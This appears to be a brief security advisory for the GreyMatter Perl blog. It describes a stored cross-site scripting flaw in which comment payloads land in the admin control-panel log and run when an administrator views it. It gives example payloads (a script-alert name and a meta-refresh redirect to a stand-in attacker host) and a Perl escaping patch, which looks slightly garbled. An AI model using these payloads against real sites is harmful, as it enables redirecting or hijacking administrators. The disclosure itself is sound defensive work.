XSS in GreyMatter blog
Graymatter - perl based web blog.
offsite: http://www.greymatterforums.com/
GM analyze posting comments and if post contain some dangerous code (like
<script></script>), administrator get message about it in log files. Log
files contain not only message, but dangerous code.
When admin try to look log files (Admin panel Options: "View Control Panel
Log"), code execute in admin's browser.
Example attack:
Add comments:
Name: <script>alert('XSS')</script>
Comment:
<meta http-equiv="refresh" content="0;
url=http://site_with_danger_content.evil"/>
And admin can't enter in "View Control Panel Log" menu, because this page
is redirecting on attacker site.
Solution:
Edit gm-library.cgi. Like that:
-----------------------------------------------------------
open (FUNNYFEET, "gm-cplog.cgi");
@gmlogfile = <FUNNYFEET>;
close (FUNNYFEET);
foreach $gmlogfileline (@gmlogfile) {
chomp ($gmlogfileline);
$gmlogfileline=~s/<b>/#BOLD_OPEN#/ig;
$gmlogfileline=~s/<\/b>/#BOLD_CLOSED#/ig;
$gmlogfileline=~s/<font size="1">/#FONT_OPEN#/ig;
$gmlogfileline=~s/<\/font>/#FONT_CLOSED#/ig;
$gmlogfileline=~s/<|>|<|>/#/ig;
$gmlogfileline=~s/#BOLD_OPEN#/<b>/ig;
$gmlogfileline=~s/#BOLD_CLOSED#/<\/b>/iig;
$gmlogfileline=~s/#FONT_OPEN#/<font size="1">/g;
$gmlogfileline=~s/#FONT_CLOSED#/<\/font>/ig;
print "$gmlogfileline<BR>";
}
print qq(<font size="1">All danger tags replace with # symbol</font><BR>);
-------------------------------------------------------
Sory for my english, it's not my primary language.
---------------------------------------------------------
http://www.securityinfo.ru